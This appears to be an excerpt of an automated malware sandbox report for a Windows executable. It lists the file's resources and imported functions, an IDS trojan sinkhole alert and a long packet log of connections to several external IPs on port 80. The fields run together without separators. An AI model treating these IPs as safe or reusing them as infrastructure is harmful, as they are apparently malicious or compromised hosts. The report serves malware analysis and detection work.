                                                                                                                                                                                                                                                                                                                                RT_ICON0x4488700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0PunjabiIndia0.5328341013824884
                                                                                                                                                                                                                                                                                                                                RT_ICON0x448f380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0PunjabiPakistan0.41203319502074687
                                                                                                                                                                                                                                                                                                                                RT_ICON0x448f380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0PunjabiIndia0.41203319502074687
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44b4e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0PunjabiPakistan0.44769503546099293
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44b4e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0PunjabiIndia0.44769503546099293
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44b9780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0PunjabiPakistan0.48853944562899787
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44b9780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0PunjabiIndia0.48853944562899787
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44c8200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0PunjabiPakistan0.47157039711191334
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44c8200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0PunjabiIndia0.47157039711191334
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44d0c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0PunjabiPakistan0.4393063583815029
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44d0c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0PunjabiIndia0.4393063583815029
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44d6300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0PunjabiPakistan0.27769709543568466
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44d6300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0PunjabiIndia0.27769709543568466
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44fbd80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0PunjabiPakistan0.28635084427767354
                                                                                                                                                                                                                                                                                                                                RT_ICON0x44fbd80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0PunjabiIndia0.28635084427767354
                                                                                                                                                                                                                                                                                                                                RT_ICON0x450c800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0PunjabiPakistan0.30901639344262294
                                                                                                                                                                                                                                                                                                                                RT_ICON0x450c800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0PunjabiIndia0.30901639344262294
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4516080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0PunjabiPakistan0.3271276595744681
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4516080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0PunjabiIndia0.3271276595744681
                                                                                                                                                                                                                                                                                                                                RT_ICON0x451ad80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0PunjabiPakistan0.27878464818763327
                                                                                                                                                                                                                                                                                                                                RT_ICON0x451ad80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0PunjabiIndia0.27878464818763327
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4529800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0PunjabiPakistan0.37454873646209386
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4529800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0PunjabiIndia0.37454873646209386
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4532280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0PunjabiPakistan0.39631336405529954
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4532280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0PunjabiIndia0.39631336405529954
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4538f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0PunjabiPakistan0.38872832369942195
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4538f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0PunjabiIndia0.38872832369942195
                                                                                                                                                                                                                                                                                                                                RT_ICON0x453e580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0PunjabiPakistan0.2769709543568465
                                                                                                                                                                                                                                                                                                                                RT_ICON0x453e580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0PunjabiIndia0.2769709543568465
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4564000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0PunjabiPakistan0.3051125703564728
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4564000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0PunjabiIndia0.3051125703564728
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4574a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0PunjabiPakistan0.3254098360655738
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4574a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0PunjabiIndia0.3254098360655738
                                                                                                                                                                                                                                                                                                                                RT_ICON0x457e300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0PunjabiPakistan0.3537234042553192
                                                                                                                                                                                                                                                                                                                                RT_ICON0x457e300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0PunjabiIndia0.3537234042553192
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45ca480x452dataPunjabiPakistan0.4475587703435805
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45ca480x452dataPunjabiIndia0.4475587703435805
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45cea00x57adataPunjabiPakistan0.43366619115549215
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45cea00x57adataPunjabiIndia0.43366619115549215
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45d4200x7b4dataPunjabiPakistan0.4224137931034483
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45d4200x7b4dataPunjabiIndia0.4224137931034483
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45dbd80x4eadataPunjabiPakistan0.4491255961844197
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45dbd80x4eadataPunjabiIndia0.4491255961844197
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45e0c80x4bedataPunjabiPakistan0.4456342668863262
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45e0c80x4bedataPunjabiIndia0.4456342668863262
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45e5880x48cdataPunjabiPakistan0.46219931271477666
                                                                                                                                                                                                                                                                                                                                RT_STRING0x45e5880x48cdataPunjabiIndia0.46219931271477666
                                                                                                                                                                                                                                                                                                                                RT_ACCELERATOR0x45ab300x40dataPunjabiPakistan0.890625
                                                                                                                                                                                                                                                                                                                                RT_ACCELERATOR0x45ab300x40dataPunjabiIndia0.890625
                                                                                                                                                                                                                                                                                                                                RT_ACCELERATOR0x45ab700x30dataPunjabiPakistan0.9583333333333334
                                                                                                                                                                                                                                                                                                                                RT_ACCELERATOR0x45ab700x30dataPunjabiIndia0.9583333333333334
                                                                                                                                                                                                                                                                                                                                RT_GROUP_CURSOR0x45c8780x30data0.9375
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x44b9480x30dataPunjabiPakistan0.9375
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x44b9480x30dataPunjabiIndia0.9375
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x4582980x76dataPunjabiPakistan0.6779661016949152
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x4582980x76dataPunjabiIndia0.6779661016949152
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x451a700x68dataPunjabiPakistan0.7019230769230769
                                                                                                                                                                                                                                                                                                                                RT_GROUP_ICON0x451a700x68dataPunjabiIndia0.7019230769230769
                                                                                                                                                                                                                                                                                                                                RT_VERSION0x45c8a80x19cdata0.5776699029126213
                                                                                                                                                                                                                                                                                                                                None0x45abb00xadataPunjabiPakistan1.8
                                                                                                                                                                                                                                                                                                                                None0x45abb00xadataPunjabiIndia1.8
                                                                                                                                                                                                                                                                                                                                None0x45aba00xadataPunjabiPakistan1.8
                                                                                                                                                                                                                                                                                                                                None0x45aba00xadataPunjabiIndia1.8
                                                                                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                                                                                KERNEL32.dllGetNativeSystemInfo, FindFirstChangeNotificationW, EnumCalendarInfoA, LoadResource, EndUpdateResourceW, InterlockedDecrement, GetCurrentProcess, GetComputerNameW, CreateHardLinkA, GetModuleHandleW, GetCommConfig, GetProcessHeap, GetConsoleAliasesLengthA, GetWindowsDirectoryA, TerminateThread, EnumResourceLanguagesA, CreateFileW, GetOverlappedResult, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, GetComputerNameA, SetComputerNameA, LoadLibraryA, OpenMutexA, LocalAlloc, GetFileType, BeginUpdateResourceA, OpenJobObjectW, FindAtomA, DeviceIoControl, GlobalFindAtomW, FindFirstVolumeMountPointA, VirtualProtect, SetCalendarInfoA, _lopen, OpenSemaphoreW, GetVersionExA, GlobalAddAtomW, OpenFileMappingA, TlsFree, LCMapStringW, lstrcpyA, BackupWrite, GetFullPathNameW, InterlockedIncrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, RaiseException, RtlUnwind, HeapFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapAlloc, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, GetStringTypeW, InitializeCriticalSectionAndSpinCount, LCMapStringA, WideCharToMultiByte
                                                                                                                                                                                                                                                                                                                                GDI32.dllGetDeviceGammaRamp
                                                                                                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                PunjabiPakistan
                                                                                                                                                                                                                                                                                                                                PunjabiIndia
                                                                                                                                                                                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                34.94.245.237192.168.2.480497342037771 12/21/23-05:02:22.588923TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804973434.94.245.237192.168.2.4
                                                                                                                                                                                                                                                                                                                                34.143.166.163192.168.2.480497362037771 12/21/23-05:02:24.914166TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804973634.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                104.198.2.251192.168.2.480497352037771 12/21/23-05:02:23.318156TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst8049735104.198.2.251192.168.2.4
                                                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.065391064 CET4973480192.168.2.434.94.245.237
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.326033115 CET804973434.94.245.237192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.326117992 CET4973480192.168.2.434.94.245.237
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.327044010 CET4973480192.168.2.434.94.245.237
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.327076912 CET4973480192.168.2.434.94.245.237
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.588783026 CET804973434.94.245.237192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.588804007 CET804973434.94.245.237192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.588922977 CET804973434.94.245.237192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.588984013 CET804973434.94.245.237192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.589068890 CET4973480192.168.2.434.94.245.237
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.591141939 CET4973480192.168.2.434.94.245.237
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.785060883 CET4973580192.168.2.4104.198.2.251
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:22.852514029 CET804973434.94.245.237192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.051307917 CET8049735104.198.2.251192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.051398039 CET4973580192.168.2.4104.198.2.251
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.051630020 CET4973580192.168.2.4104.198.2.251
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.051661015 CET4973580192.168.2.4104.198.2.251
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.317775011 CET8049735104.198.2.251192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.317815065 CET8049735104.198.2.251192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.318156004 CET8049735104.198.2.251192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.318315029 CET4973580192.168.2.4104.198.2.251
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.318547010 CET8049735104.198.2.251192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.318674088 CET4973580192.168.2.4104.198.2.251
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.585163116 CET8049735104.198.2.251192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:23.759006977 CET4973680192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.336287022 CET804973634.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.336368084 CET4973680192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.336647034 CET4973680192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.336684942 CET4973680192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.913610935 CET804973634.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.913671017 CET804973634.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.914165974 CET804973634.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.914226055 CET804973634.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.914275885 CET4973680192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:24.914340973 CET4973680192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.220696926 CET4973780192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.490849972 CET804973634.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.801959991 CET804973734.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.802033901 CET4973780192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.802311897 CET4973780192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:25.802350998 CET4973780192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.383088112 CET804973734.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.383214951 CET804973734.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.383229017 CET804973734.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.383316994 CET804973734.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.383461952 CET4973780192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.383461952 CET4973780192.168.2.434.143.166.163
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.514938116 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.783824921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.783902884 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.784163952 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.784203053 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:26.963735104 CET804973734.143.166.163192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.052906036 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.052962065 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070588112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070641994 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070689917 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070741892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070780993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070817947 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070878983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070892096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070908070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070925951 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070935965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070940018 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070965052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.070977926 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.071017981 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339428902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339514017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339565992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339566946 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339623928 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339668989 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339673996 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339761972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339814901 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339826107 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339874029 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339919090 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.339946985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340013981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340055943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340087891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340127945 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340162992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340168953 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340271950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340307951 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340348959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340435982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340472937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340477943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340579987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340596914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340627909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340648890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.340689898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608407974 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608560085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608577013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608596087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608609915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608614922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608637094 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608668089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608690023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608707905 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608752966 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608793020 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608824015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608881950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608915091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608928919 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.608989000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609033108 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609054089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609106064 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609118938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609149933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609160900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609210014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609215975 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609224081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609256983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609261990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609271049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609306097 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609344006 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609357119 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609369040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609380960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609396935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609419107 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609420061 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609457970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609473944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609488964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609498978 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609505892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609523058 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609525919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609560966 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609572887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609606981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609623909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609637022 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609651089 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609675884 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609678030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609698057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609714031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:27.609741926 CET4973880192.168.2.491.215.85.17
